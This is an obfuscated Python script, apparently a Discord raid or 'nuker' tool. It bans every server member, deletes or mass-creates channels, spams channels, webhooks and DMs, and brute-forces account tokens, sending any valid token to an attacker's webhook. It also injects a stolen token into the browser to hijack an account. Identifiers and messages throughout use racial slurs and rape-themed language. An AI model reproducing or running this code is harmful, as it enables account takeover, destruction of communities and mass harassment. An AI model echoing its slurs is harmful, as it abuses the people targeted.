# you can decode this tbh just yeah i legit used a online obfuscator 
import sys #line:1
import discord #line:2
import shutil #line:3
from colorama import init ,Fore ,Back #line:4
import itertools #line:5
import requests #line:6
import time #line:7
import aiohttp #line:8
import random #line:9
import asyncio #line:10
import ctypes #line:11
import click #line:12
import os #line:13
import random #line:14
import string #line:15
import base64 #line:16
import threading #line:17
from concurrent .futures import ThreadPoolExecutor #line:18
from selenium import webdriver #line:19
from time import sleep #line:20
init (autoreset =True )#line:21
TOKEN_TYPE_BOT =1 #line:26
TOKEN_TYPE_ACCOUNT =2 #line:27
def token_type_to_str (OOO0O0O0OO0000OOO ):#line:30
    return "Bot"if OOO0O0O0OO0000OOO ==TOKEN_TYPE_BOT else "Bearer"#line:31
BOT_TOKEN =''#line:34
ACCOUNT_TOKEN =''#line:35
GUILD_ID =''#line:36
TOKEN_TYPE =None #line:37
TARGET_VERSION =0 #line:38
def get_proxy_type ():#line:41
    O0O0000OOOO0OO00O ="http"#line:42
    if "socks5"in O0O0000OOOO0OO00O :#line:43
        O0O0000OOOO0OO00O ="socks5"#line:44
    return O0O0000OOOO0OO00O #line:45
heads =[{"Content-Type":"application/json",'User-Agent':'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36'},{"Content-Type":"application/json","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"},{"Content-Type":"application/json","User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"},{"Content-Type":"application/json",'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'},{"Content-Type":"application/json","User-Agent":"Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1"},{"Content-Type":"application/json","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"}]#line:76
def Find_HOES (O0000O0OO0O0000OO ,OOO0O0O00O000O000 ):#line:78
    OO0OOO0OO0OO00OO0 ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {O0000O0OO0O0000OO}',}#line:81
    O0O0000OO00OOO00O =requests .get (f'https://discord.com/api/v10/guilds/{OOO0O0O00O000O000}/channels',headers =OO0OOO0OO0OO00OO0 )#line:83
    if O0O0000OO00OOO00O .status_code ==200 :#line:85
        return O0O0000OO00OOO00O .json ()#line:86
    else :#line:87
        print (f"Failed to fetch HOES: {O0O0000OO00OOO00O.text}")#line:88
        return []#line:89
def HeadersMain (token =None ):#line:91
    OOOO0OOO00OO0O0OO =random .choice (heads )#line:92
    if token :#line:93
        OOOO0OOO00OO0O0OO .update ({"Authorization":token })#line:94
    return OOOO0OOO00OO0O0OO #line:95
async def main_bot_message (OO00O0O000O0OOOOO ,O00O0OOOOO0O0OOOO ,O0000O00O000000OO ):#line:97
    O0OOO0OOOOO0O0OO0 ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {OO00O0O000O0OOOOO}','Content-Type':'application/json',}#line:101
    OOOOOOOOO000OOOOO ={'content':O0000O00O000000OO ,}#line:105
    async with aiohttp .ClientSession ()as O00OO00O00O00000O :#line:107
        async with O00OO00O00O00000O .get (f'https://discord.com/api/v10/guilds/{O00O0OOOOO0O0OOOO}/members',headers =O0OOO0OOOOO0O0OO0 )as O000000O00OO000O0 :#line:108
            if O000000O00OO000O0 .status ==200 :#line:109
                OOOOO0O000OOOO0O0 =await O000000O00OO000O0 .json ()#line:110
                for OO00O00OOOOO0OOOO in OOOOO0O000OOOO0O0 :#line:111
                    if 'user'in OO00O00OOOOO0OOOO :#line:112
                        OOO00OO00OOOOO0O0 =OO00O00OOOOO0OOOO ['user']['id']#line:113
                        async with O00OO00O00O00000O .post (f'https://discord.com/api/v10/users/{OOO00OO00OOOOO0O0}/messages',headers =O0OOO0OOOOO0O0OO0 ,json =OOOOOOOOO000OOOOO )as O0OO00O00OOOO00OO :#line:114
                            if O0OO00O00OOOO00OO .status ==200 :#line:115
                                print (f"Message was send to user > > > {OOO00OO00OOOOO0O0}: {O0000O00O000000OO}")#line:116
                            else :#line:117
                                print (f"Failed to send message to a user D:")#line:118
            else :#line:119
                print (f"failed to get members {await O000000O00OO000O0.text()}")#line:120
def validtoken (O000O0OOO0O0OOO00 ):#line:122
    OOO00OO0O00O0O00O ={'Authorization':O000O0OOO0O0OOO00 ,}#line:125
    OOOO00000O00O00O0 =requests .get ('https://discord.com/api/v10/users/@me',headers =OOO00OO0O00O0O00O )#line:127
    if OOOO00000O00O00O0 .status_code ==200 :#line:129
        print ("Token is LEGIT.")#line:130
        return True #line:131
    else :#line:132
        print ("Token is NOT LEGIT")#line:133
        return False #line:134
def massdmconfig (O000O0O0OO0O0O0OO ,O0O0OO000OOOO0000 ,OOO0000OOO00OOOO0 ):#line:136
    try :#line:137
        requests .post (f'https://discord.com/api/v9/channels/{O0O0OO000OOOO0000}/messages',headers ={'Authorization':O000O0O0OO0O0O0OO },data ={"content":OOO0000OOO00OOOO0 })#line:140
        print (f"{Fore.RED}Messaged {Fore.BLUE}ID: {O0O0OO000OOOO0000}{Fore.RESET}")#line:141
    except Exception as O00OO0OO00OO0OO00 :#line:142
        print (f"FREAK: {O00OO0OO00OO0OO00}")#line:143
def massdm ():#line:145
    O00O00OOO0O0OO00O =input (f"{Fore.RED} Token: {Fore.BLUE}")#line:146
    if not validtoken (O00O00OOO0O0OO00O ):#line:148
        print ("Invalid token")#line:149
        return #line:150
    O0O0O0OOO0OOOOO0O =input (f"{Fore.RED} message to send to every friend: {Fore.BLUE}")#line:152
    OO0O0O0OO00O0O0OO =requests .get ("https://discord.com/api/v9/users/@me/channels",headers ={'Authorization':O00O00OOO0O0OO00O }).json ()#line:154
    with ThreadPoolExecutor ()as O0O0000O000000000 :#line:156
        OO000OO0OOO0OO0O0 =[O0O0000O000000000 .submit (massdmconfig ,O00O00OOO0O0OO00O ,O00O0O0OO0O0OO0OO ['id'],O0O0O0OOO0OOOOO0O )for O00O0O0OO0O0OO0OO in OO0O0O0OO00O0O0OO ]#line:157
    print (":3 messages send :3 x3")#line:159
def chat (OOOO00O0OOO0O0OOO ,OOO00000OOOOO0OO0 ,O0OO00O000OO00OO0 ):#line:162
    O0OOO000OO0O0000O ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {OOOO00O0OOO0O0OOO}','Content-Type':'application/json',}#line:166
    O0O000OOOO0OO0O0O ={'content':O0OO00O000OO00OO0 ,}#line:170
    O00OO0O0OO0000O0O =requests .post (f'https://discord.com/api/v10/channels/{OOO00000OOOOO0OO0}/messages',headers =O0OOO000OO0O0000O ,json =O0O000OOOO0OO0O0O )#line:172
    if O00OO0O0OO0000O0O .status_code ==200 :#line:174
        print (f"message send: {O0OO00O000OO00OO0}")#line:175
    else :#line:176
        print (f"failure to send msg")#line:177
class Edge_Installer (object ):#line:179
    installed =False #line:180
    target_version =None #line:181
    DL_BASE ="https://msedgedriver.azureedge.net/"#line:182
    def __init__ (OO0OO0O0O0OOOO00O ,executable_path =None ,target_version =None ,*OOOOO00000000OOOO ,**O000OOO000O0O0OOO ):#line:184
        OO0OO0O0O0OOOO00O .platform =sys .platform #line:185
        if TARGET_VERSION :#line:187
            OO0OO0O0O0OOOO00O .target_version =TARGET_VERSION #line:188
        if target_version :#line:190
            OO0OO0O0O0OOOO00O .target_version =target_version #line:191
        if not OO0OO0O0O0OOOO00O .target_version :#line:193
            OO0OO0O0O0OOOO00O .target_version =OO0OO0O0O0OOOO00O .get_release_version_number ().version [0 ]#line:194
        OO0OO0O0O0OOOO00O ._base =O0O0O0OO0O00O0OOO ="edgedriver{}"#line:196
        O00OO00O0O000OO00 =OO0OO0O0O0OOOO00O ._base #line:198
        if OO0OO0O0O0OOOO00O .platform in ("win32",):#line:199
            O00OO00O0O000OO00 =O0O0O0OO0O00O0OOO .format (".exe")#line:200
        if OO0OO0O0O0OOOO00O .platform in ("linux",):#line:201
            OO0OO0O0O0OOOO00O .platform +="64"#line:202
            O00OO00O0O000OO00 =O00OO00O0O000OO00 .format ("")#line:203
        if OO0OO0O0O0OOOO00O .platform in ("darwin",):#line:204
            OO0OO0O0O0OOOO00O .platform ="mac64"#line:205
            O00OO00O0O000OO00 =O00OO00O0O000OO00 .format ("")#line:206
        OO0OO0O0O0OOOO00O .executable_path =executable_path or O00OO00O0O000OO00 #line:207
        OO0OO0O0O0OOOO00O ._exe_name =O00OO00O0O000OO00 #line:208
        if not os .path .exists (OO0OO0O0O0OOOO00O .executable_path ):#line:210
            OO0OO0O0O0OOOO00O .fetch_edgedriver ()#line:211
            if not OO0OO0O0O0OOOO00O .__class__ .installed :#line:212
                if OO0OO0O0O0OOOO00O .patch_binary ():#line:213
                    OO0OO0O0O0OOOO00O .__class__ .installed =True #line:214
def get_driver ():#line:218
    OOOO0OOOO00OOOO0O =["msedgedriver.exe"]#line:219
    print (f"\n{Fore.BLUE} Checking Driver")#line:221
    sleep (0.5 )#line:222
    for O0000O000O000OO00 in OOOO0OOOO00OOOO0O :#line:224
        if os .path .exists (os .getcwd ()+os .sep +O0000O000O000OO00 ):#line:225
            print (f" {Fore.BLUE}{O0000O000O000OO00} already exists, continuing. . .{Fore.RESET}")#line:226
            sleep (0.5 )#line:227
            return O0000O000O000OO00 #line:228
    else :#line:229
        print (f"{Fore.RED}  Driver not found INSTALLING")#line:230
        if os .path .exists (os .getenv ('localappdata')+'\\Microsoft\\Edge'):#line:231
            Edge_Installer ()#line:232
            print (f"{Fore.GREEN} msedgedriver.exe downloaded haha down down syndrome{Fore.RESET}")#line:233
            return "msedgedriver.exe"#line:234
        else :#line:235
            print (f'i forgot what this was for ')#line:236
            Edge_Installer ()#line:237
            print (f"{Fore.GREEN} tryna install msedgedriver :3{Fore.RESET}")#line:238
            return "msedgedriver.exe"#line:239
def Summon_Channels (OO00OOOOOO00O0OO0 ,O00O000OOOO00O0O0 ,OO0OOOO0OO0O0OOO0 ,OOOOOOOOO0OO0O0OO ):#line:241
    O0OO0OO0OO0000O00 ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {OO00OOOOOO00O0OO0}','Content-Type':'application/json',}#line:245
    for OO0OOOO0OO0O0OOOO in range (OOOOOOOOO0OO0O0OO ):#line:247
        for O000000OO00O0OO0O in OO0OOOO0OO0O0OOO0 :#line:248
            O0O00OOO0OOOOO0O0 ={'name':O000000OO00O0OO0O ,'type':0 ,}#line:252
            OOO0O0O0OO00OOO00 =requests .post (f'https://discord.com/api/v10/guilds/{O00O000OOOO00O0O0}/channels',headers =O0OO0OO0OO0000O00 ,json =O0O00OOO0OOOOO0O0 )#line:254
            if OOO0O0O0OO00OOO00 .status_code ==201 :#line:256
                print (f"Channel created")#line:257
            else :#line:258
                print (f"Failed to create channel")#line:259
def Ban_everyNIGGA (OOO00O0000OOOOO0O ,O00O000000O0O00OO ):#line:261
    OOO0OOOOOOO000OOO ={'Authorization':f'Bot {OOO00O0000OOOOO0O}',}#line:264
    OO0OO0O0O0O0OO000 =None #line:266
    O0OO00000OO0OOOOO ='Join discord.gg/FGH YOU noobie'#line:267
    while True :#line:269
        OOOOO00OOOOO00OOO ={'limit':1000 ,'after':OO0OO0O0O0O0OO000 ,}#line:273
        O00O0O0OOO00OOO00 =requests .get (f'https://discord.com/api/v10/guilds/{O00O000000O0O00OO}/members',headers =OOO0OOOOOOO000OOO ,params =OOOOO00OOOOO00OOO )#line:275
        if O00O0O0OOO00OOO00 .status_code ==200 :#line:277
            O00O0000OOOO00OOO =O00O0O0OOO00OOO00 .json ()#line:278
            if not O00O0000OOOO00OOO :#line:280
                break #line:281
            for O000O00OO0O0000OO in O00O0000OOOO00OOO :#line:283
                if 'user'in O000O00OO0O0000OO :#line:284
                    OO0000OOO0OO0O00O =O000O00OO0O0000OO ['user']['id']#line:285
                    O0O000O0OOO0O0OO0 ={'reason':O0OO00000OO0OOOOO }#line:288
                    O00O0O0OOO00OOO00 =requests .put (f'https://discord.com/api/v10/guilds/{O00O000000O0O00OO}/bans/{OO0000OOO0OO0O00O}',headers =OOO0OOOOOOO000OOO ,json =O0O000O0OOO0O0OO0 )#line:289
                    if O00O0O0OOO00OOO00 .status_code ==204 :#line:290
                        print (f"Banned user: {OO0000OOO0OO0O00O} for reason: {O0OO00000OO0OOOOO}")#line:291
                    else :#line:292
                        print (f"Failed to ban user {OO0000OOO0OO0O00O}: {O00O0O0OOO00OOO00.text}")#line:293
            OO0OO0O0O0O0OO000 =O00O0000OOOO00OOO [-1 ]['user']['id']#line:295
        else :#line:297
            print (f"Failed to fetch members: {O00O0O0OOO00OOO00.text}")#line:298
            break #line:299
def RAPE_ALL_CHANNELS (OO00O00OOO0O0000O ,OO0OOO000O0O0OO00 ):#line:302
    OOO00OO00OOOOO000 ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {OO00O00OOO0O0000O}',}#line:305
    O000O0O00OO0OO00O =Find_HOES (OO00O00OOO0O0000O ,OO0OOO000O0O0OO00 )#line:307
    for O0O0OOOOOO0OO000O in O000O0O00OO0OO00O :#line:309
        O0OOOO0OO00O0O000 =O0O0OOOOOO0OO000O ['id']#line:310
        OO00000OO000000O0 =requests .delete (f'https://discord.com/api/v10/channels/{O0OOOO0OO00O0O000}',headers =OOO00OO00OOOOO000 )#line:311
        if OO00000OO000000O0 .status_code ==204 :#line:313
            print (f"Deleted a channel")#line:314
        else :#line:315
            print (f"Failed to delete an channel")#line:316
async def send_message_to_webhook (OOO0OOO0OOOO0OOO0 ,OO00OOOOOOO0OOO00 ,O0OO0O000O0OOOOO0 ,O0O000O0OOOOO00O0 ):#line:318
    async with OOO0OOO0OOOO0OOO0 .post (OO00OOOOOOO0OOO00 ,json ={"content":f"{O0OO0O000O0OOOOO0} - Webhook {O0O000O0OOOOO00O0}"})as OOO00O0OO0OOOOOOO :#line:319
        if OOO00O0OO0OOOOOOO .status ==204 :#line:320
            print (f"{Fore.RED}Message sent to webhook {O0O000O0OOOOO00O0}: {O0OO0O000O0OOOOO0}")#line:321
        else :#line:322
            print (f"error with webhook ")#line:323
async def chat_with_webhooks (O0OO0OO000O0OO000 ,O000O000OOO00000O ):#line:325
    while True :#line:326
        if O0OO0OO000O0OO000 :#line:327
            async with aiohttp .ClientSession ()as O0000O0OO000OOO00 :#line:328
                O0OO00OO00OO00000 =[]#line:329
                for O0O0OO0000000O000 ,OO0O00OO0O0O0O0OO in enumerate (O0OO0OO000O0OO000 ,start =1 ):#line:331
                    O0O000O00OOOOO0OO =send_message_to_webhook (O0000O0OO000OOO00 ,OO0O00OO0O0O0O0OO ,O000O000OOO00000O ,O0O0OO0000000O000 )#line:332
                    O0OO00OO00OO00000 .append (O0O000O00OOOOO0OO )#line:333
                await asyncio .gather (*O0OO00OO00OO00000 )#line:335
        else :#line:336
            print (f"{Fore.CYAN} no webRAPERS where found so now chatting as the bot")#line:337
        await asyncio .sleep (0 )#line:340
def clear ():#line:342
    OOOOOO0OO00000OOO =os .name #line:343
    if OOOOOO0OO00000OOO =='nt':#line:344
        os .system ('cls')#line:345
    elif OOOOOO0OO00000OOO =='posix':#line:346
        os .system ('clear')#line:347
    else :#line:348
        print ('\n'*120 )#line:349
    return #line:350
def Create_webRAPERS (OOO0OO0O0OO0OO0OO ,OOOOO0OOO00OOOO00 ):#line:353
    O000O00O00O0OOOO0 ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {OOO0OO0O0OO0OO0OO}','Content-Type':'application/json',}#line:357
    O0OOOO00OOO0000O0 =requests .get (f'https://discord.com/api/v10/guilds/{OOOOO0OOO00OOOO00}/channels',headers =O000O00O00O0OOOO0 )#line:359
    if O0OOOO00OOO0000O0 .status_code ==200 :#line:361
        O0O000O0OO0OOOO0O =O0OOOO00OOO0000O0 .json ()#line:362
        O0O0OOO00OOOOOOOO =[]#line:363
        for OO000O0000OOO0OO0 in O0O000O0OO0OOOO0O :#line:365
            if OO000O0000OOO0OO0 ['type']==0 :#line:366
                O0OO0O000O000000O =Existing_Rapers (OOO0OO0O0OO0OO0OO ,OO000O0000OOO0OO0 ['id'])#line:367
                if O0OO0O000O000000O :#line:369
                    OOOO00O00OOO00OOO =O0OO0O000O000000O [0 ]#line:370
                    print (f"existing rapers that where found are now raping channels aka hoes")#line:371
                else :#line:372
                    OO0O000O00OOOOOOO ={'name':'Webhook',}#line:375
                    O00000OOO0000O0OO =requests .post (f'https://discord.com/api/v10/channels/{OO000O0000OOO0OO0["id"]}/webhooks',headers =O000O00O00O0OOOO0 ,json =OO0O000O00OOOOOOO )#line:376
                    if O00000OOO0000O0OO .status_code ==200 :#line:378
                        OOOOOOOO0OOOO0O00 =O00000OOO0000O0OO .json ()#line:379
                        OOOO00O00OOO00OOO =OOOOOOOO0OOOO0O00 ['url']#line:380
                        print (f"raper made for an channel ")#line:381
                    else :#line:382
                        print (f"a raper has fallen D:")#line:383
                O0O0OOO00OOOOOOOO .append (OOOO00O00OOO00OOO )#line:385
                time .sleep (0.2 )#line:387
        return O0O0OOO00OOOOOOOO #line:388
    else :#line:389
        print (f"failed to get a hoe D: aka channel")#line:390
        return []#line:391
def Existing_Rapers (O0OO00O00000O0OO0 ,OO0O0O0OOO0O00O0O ):#line:393
    OO0O0OOO000O0O00O ={'Authorization':f'{token_type_to_str(TOKEN_TYPE)} {O0OO00O00000O0OO0}',}#line:396
    O0O00000O0O0O00O0 =requests .get (f'https://discord.com/api/v10/channels/{OO0O0O0OOO0O00O0O}/webhooks',headers =OO0O0OOO000O0O00O )#line:398
    if O0O00000O0O0O00O0 .status_code ==200 :#line:400
        O00OO0OOOO0OO0000 =O0O00000O0O0O00O0 .json ()#line:401
        return [O0O0OOO000OOOO00O ['url']for O0O0OOO000OOOO00O in O00OO0OOOO0OO0000 ]#line:402
    else :#line:403
        print (f"Failed raper")#line:404
        return []#line:405
def token_bruteforce ():#line:406
    O0O0OOOOO0O0O0OO0 =base64 .b64encode ((input ("User ID: ")).encode ("ascii"))#line:408
    O0O0OOOOO0O0O0OO0 =str (O0O0OOOOO0O0O0OO0 )[2 :-1 ]#line:409
    OO00OO0OO000OO0OO =input (f'{Fore.GREEN} Webhook Url: {Fore.BLACK}')#line:411
    def O0O0O00O0O0O0OO00 ():#line:413
        while True :#line:414
            O0O0O0O000OOOOOO0 =O0O0OOOOO0O0O0OO0 +'.'+''.join (random .choices (string .ascii_letters +string .digits ,k =4 ))+'.'+''.join (random .choices (string .ascii_letters +string .digits ,k =25 ))#line:416
            OOOO00O000O00OO0O =requests .get ('https://discord.com/api/v9/auth/login',headers =HeadersMain (O0O0O0O000OOOOOO0 ))#line:417
            try :#line:418
                if OOOO00O000O00OO0O .status_code ==200 :#line:419
                    print (f'{Fore.BLUE} Valid'+' '+O0O0O0O000OOOOOO0 )#line:420
                    O0O0O00000O000OOO (O0O0O0O000OOOOOO0 )#line:421
                else :#line:422
                    print (f'{Fore.GREEN} Invalid'+f'{Fore.BLUE} '+O0O0O0O000OOOOOO0 )#line:423
            except Exception as O00O0O0O00O00O00O :#line:424
                print ('Error:',O00O0O0O00O00O00O )#line:425
            finally :#line:426
                print ('')#line:427
    def O0O0O00000O000OOO (OO00OO0OO0OO0OOOO ):#line:429
        OOO0O0OO0O0O0OO0O ={"content":OO00OO0OO0OO0OOOO ,}#line:432
        try :#line:433
            O0O0O0000O0O0000O =requests .post (OO00OO0OO000OO0OO ,json =OOO0O0OO0O0O0OO0O )#line:434
            O0O0O0000O0O0000O .raise_for_status ()#line:435
        except requests .exceptions .RequestException as O00000O0OO000000O :#line:436
            print ('failed to send to dizzy:',O00000O0OO000000O )#line:437
    def O0OOOOOO000O0O000 ():#line:439
        for _OOOOO0OO00OO00OO0 in range (15 ):#line:440
            threading .Thread (target =O0O0O00O0O0O0OO00 ).start ()#line:441
    O0OOOOOO000O0O000 ()#line:443
def TokenLoging (OO0O00O000OOO0O00 ):#line:445
    OOO00OO0000OOO0O0 =requests .get ("https://discord.com/api/v10/users/@me",headers =HeadersMain (OO0O00O000OOO0O00 )).json ()#line:446
    OOO00OO0O0O000OO0 =OOO00OO0000OOO0O0 ["username"]+"#"+str (OOO00OO0000OOO0O0 ["discriminator"])#line:447
    OO000OO0OO0OOOO0O ="""
            document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"%s"`
            location.reload();
        """%(OO0O00O000OOO0O00 )#line:451
    O000OOO0OO00OO000 =get_driver ()#line:452
    if O000OOO0OO00OO000 =="msedgedriver.exe":#line:454
        O0OO00OOOO00OO00O =webdriver .EdgeOptions ()#line:455
        O0OO00OOOO00OO00O .add_experimental_option ('excludeSwitches',['enable-logging'])#line:456
        O0OO00OOOO00OO00O .add_experimental_option ("detach",True )#line:457
        OO00OO00O0O0000O0 =webdriver .Edge (options =O0OO00OOOO00OO00O )#line:458
    else :#line:459
        print (f'{Fore.RED} coudlnt find a driver fuck u {OOO00OO0O0O000OO0}')#line:460
        sleep (3 )#line:461
        print (f"{Fore.BLUE} script into the console of your browser:\n\n{Back.RED}{OO000OO0OO0OOOO0O}\n{Back.RESET}")#line:462
    print (f"{Fore.BLUE}going anal into {Fore.BLUE}{OOO00OO0O0O000OO0}")#line:464
    OO00OO00O0O0000O0 .get ("https://discordapp.com/login")#line:465
    OO00OO00O0O0000O0 .execute_script (OO000OO0OO0OOOO0O )#line:466
def tokenlogin ():#line:468
    OO000OO0O0O00O0OO =input (f' <~> {Fore.RED}Token: {Fore.RED}')#line:469
    validtoken (OO000OO0O0O00O0OO )#line:470
    TokenLoging (OO000OO0O0O00O0OO )#line:471
def main ():#line:473
    global BOT_TOKEN ,ACCOUNT_TOKEN ,GUILD_ID ,TOKEN_TYPE #line:474
    O0000OOO0OOO0O0OO =f"""
{Fore.GREEN}╔═════════════════════════════════════╗
{Fore.BLUE}║   ███████╗░░░░██████╗░░░░██╗░░██╗   ║
{Fore.GREEN}║   ██╔════╝░░░██╔════╝░░░░██║░░██║   ║
{Fore.BLUE}║   █████╗░░░░░██║░░██╗░░░░███████║   ║
{Fore.GREEN}║   ██╔══╝░░░░░██║░░╚██╗░░░██╔══██║   ║
{Fore.BLUE}║   ██║░░░░░██╗╚██████╔╝██╗██║░░██║   ║ 
{Fore.GREEN}║   ╚═╝░░░░░╚═╝░╚═════╝░╚═╝╚═╝░░╚═╝   ║  
{Fore.BLUE}╚═══                               ═══╝
    """#line:485
    print (O0000OOO0OOO0O0OO )#line:487
    while not TOKEN_TYPE :#line:489
        print ("\nSelect the token type:")#line:490
        print (f"{Fore.RED}[1] Bot Token (Discord API)")#line:491
        print (f"{Fore.BLUE}soon probably gonna be tiktok")#line:492
        O0O0000OO000O0O00 =input (f"""{Fore.GREEN}   \n║ Enter the option                               
╚════════════════ 1 / 2:""")#line:495
        if O0O0000OO000O0O00 =="1":#line:497
            TOKEN_TYPE =TOKEN_TYPE_BOT #line:498
        elif O0O0000OO000O0O00 =="2":#line:499
            TOKEN_TYPE =TOKEN_TYPE_ACCOUNT #line:500
        else :#line:501
            print ("if you ever make a INVALID option again imma rape u much love from ymxm on discord")#line:502
    if TOKEN_TYPE ==TOKEN_TYPE_BOT :#line:504
        clear ()#line:505
        while True :#line:506
            print ("\nBot Options:")#line:507
            print (f"{Fore.BLUE} [!] Quit   ")#line:508
            print (f"{Fore.RED}╔═══ NUKE                          ═══╗ ╔═══ MISC                          ═══╗ ╔═══WEBHOOKS                       ═══╗ ")#line:509
            print (f"{Fore.BLUE}║   [1] Mass Message (BEST ONE)       ║ ║    [6] brute force                  ║ ║                                     ║")#line:510
            print (f"{Fore.RED}║   [2] Create Channels               ║ ║    [7] mass dm                      ║ ║                                     ║")#line:511
            print (f"{Fore.BLUE}║   [3] Ban everyone                  ║ ║    [8] force login                  ║ ║                                     ║")#line:512
            print (f"{Fore.RED}║   [4] Dm whole server               ║ ║                                     ║ ║                                     ║")#line:513
            print (f"{Fore.BLUE}║   [5] Delete All Channels           ║ ║                                     ║ ║                                     ║")#line:514
            print (f"{Fore.RED}║                                     ║ ║                                     ║ ║                                     ║")#line:515
            print (f"{Fore.BLUE}║                                     ║ ║                                     ║ ║                                     ║")#line:516
            print (f"{Fore.RED}║                                     ║ ║                                     ║ ║                                     ║")#line:517
            print (f"{Fore.BLUE}║                                     ║ ║                                     ║ ║                                     ║")#line:518
            print (f"{Fore.RED}║                                     ║ ║                                     ║ ║                                     ║")#line:519
            print (f"{Fore.BLUE}╚═══                               ═══╝ ╚═══                               ═══╝ ╚═══                               ═══╝")#line:520
            O0000OO00OOO00O00 =input (f"""{Fore.RED}║ Select an option
╚══════════════════⪢ :""")#line:524
            if O0000OO00OOO00O00 =="1":#line:526
                while not BOT_TOKEN :#line:527
                    BOT_TOKEN =input (f"{Fore.BLUE}~~ Bot Token: ")#line:528
                while not GUILD_ID :#line:530
                    GUILD_ID =input (f"{Fore.BLUE}~~ Guild id: ")#line:531
                OO0O0OO00OOOO00O0 =input (f"{Fore.RED}~~ Enable webhooks? (Y/N): ").strip ().lower ()#line:533
                OOOOO0O0O0000OOOO =OO0O0OO00OOOO00O0 =="y"#line:534
                OO0O0OO0O0O00OOOO =input (f"{Fore.BLUE}~~ Message: ")#line:536
                clear ()#line:537
                if OO0O0OO0O0O00OOOO :#line:538
                    if OOOOO0O0O0000OOOO :#line:539
                        OO0O0O0OOO0O000O0 =Create_webRAPERS (BOT_TOKEN ,GUILD_ID )#line:540
                        if OO0O0O0OOO0O000O0 :#line:541
                            asyncio .run (chat_with_webhooks (OO0O0O0OOO0O000O0 ,OO0O0OO0O0O00OOOO ))#line:542
                        else :#line:543
                            print (f"{Fore.RED}No rapers were created chatting without Rapers.")#line:544
                            clear ()#line:545
                    else :#line:546
                        try :#line:547
                            while True :#line:548
                                O0O0OO0OO00O00OOO =Find_HOES (BOT_TOKEN ,GUILD_ID )#line:549
                                for O0O000OOOO00OOOO0 in O0O0OO0OO00O00OOO :#line:550
                                    if O0O000OOOO00OOOO0 ['type']==0 :#line:551
                                        chat (BOT_TOKEN ,O0O000OOOO00OOOO0 ['id'],OO0O0OO0O0O00OOOO )#line:552
                                time .sleep (1 )#line:553
                        except KeyboardInterrupt :#line:554
                            print ("\nRaper Stoped")#line:555
                else :#line:556
                    print ("enter a chat message.")#line:557
            elif O0000OO00OOO00O00 =="2":#line:559
                while not BOT_TOKEN :#line:560
                    BOT_TOKEN =input ("bot token: ")#line:561
                while not GUILD_ID :#line:563
                    GUILD_ID =input ("~~ Guild id: ")#line:564
                O00OO0OOO00000OOO =input ("enter channels ( mutliple is like e, a, b) ").split (',')#line:566
                O000OO0OOOO0O0O0O =int (input ("amout of hoes: "))#line:567
                clear ()#line:568
                if O00OO0OOO00000OOO and O000OO0OOOO0O0O0O >0 :#line:569
                    Summon_Channels (BOT_TOKEN ,GUILD_ID ,O00OO0OOO00000OOO ,O000OO0OOOO0O0O0O )#line:570
                else :#line:571
                    print ("enter a valid format stupid no namer.")#line:572
            elif O0000OO00OOO00O00 =="3":#line:574
                while not BOT_TOKEN :#line:575
                    BOT_TOKEN =input ("bot token: ")#line:576
                while not GUILD_ID :#line:578
                    GUILD_ID =input ("~~ Guild id: ")#line:579
                O0OO0O0O00O00OOO0 =input ("is this the right server (Y/N): ").strip ().lower ()#line:581
                if O0OO0O0O00O00OOO0 =="y":#line:582
                    Ban_everyNIGGA (BOT_TOKEN ,GUILD_ID )#line:583
                    clear ()#line:584
                else :#line:585
                    print ("Banning canceled.")#line:586
            elif O0000OO00OOO00O00 =="4":#line:588
                while not BOT_TOKEN :#line:589
                    BOT_TOKEN =input ("~~ Bot Token: ")#line:590
                while not GUILD_ID :#line:592
                    GUILD_ID =input ("~~ Guild id: ")#line:593
                OO0O0OO0O0O00OOOO =input ("custom message: ")#line:595
                clear ()#line:596
                if OO0O0OO0O0O00OOOO :#line:597
                    try :#line:598
                        O0O00O0O0OOO0O00O =discord .Intents .default ()#line:599
                        O0O00O0O0OOO0O00O .typing =True #line:600
                        O0O00O0O0OOO0O00O .presences =True #line:601
                        O0O00O0O0OOO0O00O .members =True #line:602
                        OOOOO00O0O00O00OO =discord .Client (intents =O0O00O0O0OOO0O00O )#line:604
                        @OOOOO00O0O00O00OO .event #line:606
                        async def O00000O0OO0000OOO ():#line:607
                            print (f'Logged in as {OOOOO00O0O00O00OO.user.name}')#line:608
                            try :#line:609
                                O0O000OO0OOOO0O0O =OOOOO00O0O00O00OO .get_guild (int (GUILD_ID ))#line:610
                                if O0O000OO0OOOO0O0O :#line:611
                                    print (f'Found guild: {O0O000OO0OOOO0O0O.name} (ID: {O0O000OO0OOOO0O0O.id})')#line:612
                                    for _O00OO0OOOO00O0O00 in range (3 ):#line:614
                                        for OO0OOOO0OO000OOOO in O0O000OO0OOOO0O0O .members :#line:615
                                            if OO0OOOO0OO000OOOO .id !=OOOOO00O0O00O00OO .user .id :#line:616
                                                try :#line:617
                                                    print (f'Sending message to > {OO0OOOO0OO000OOOO.name}')#line:618
                                                    await OO0OOOO0OO000OOOO .send (OO0O0OO0O0O00OOOO )#line:619
                                                    print (f'Done sending to > {OO0OOOO0OO000OOOO.name}')#line:620
                                                except discord .Forbidden :#line:621
                                                    print (f'Failed to send message to {OO0OOOO0OO000OOOO.name} (DMs may be disabled for the user or your bot is rate limited)')#line:622
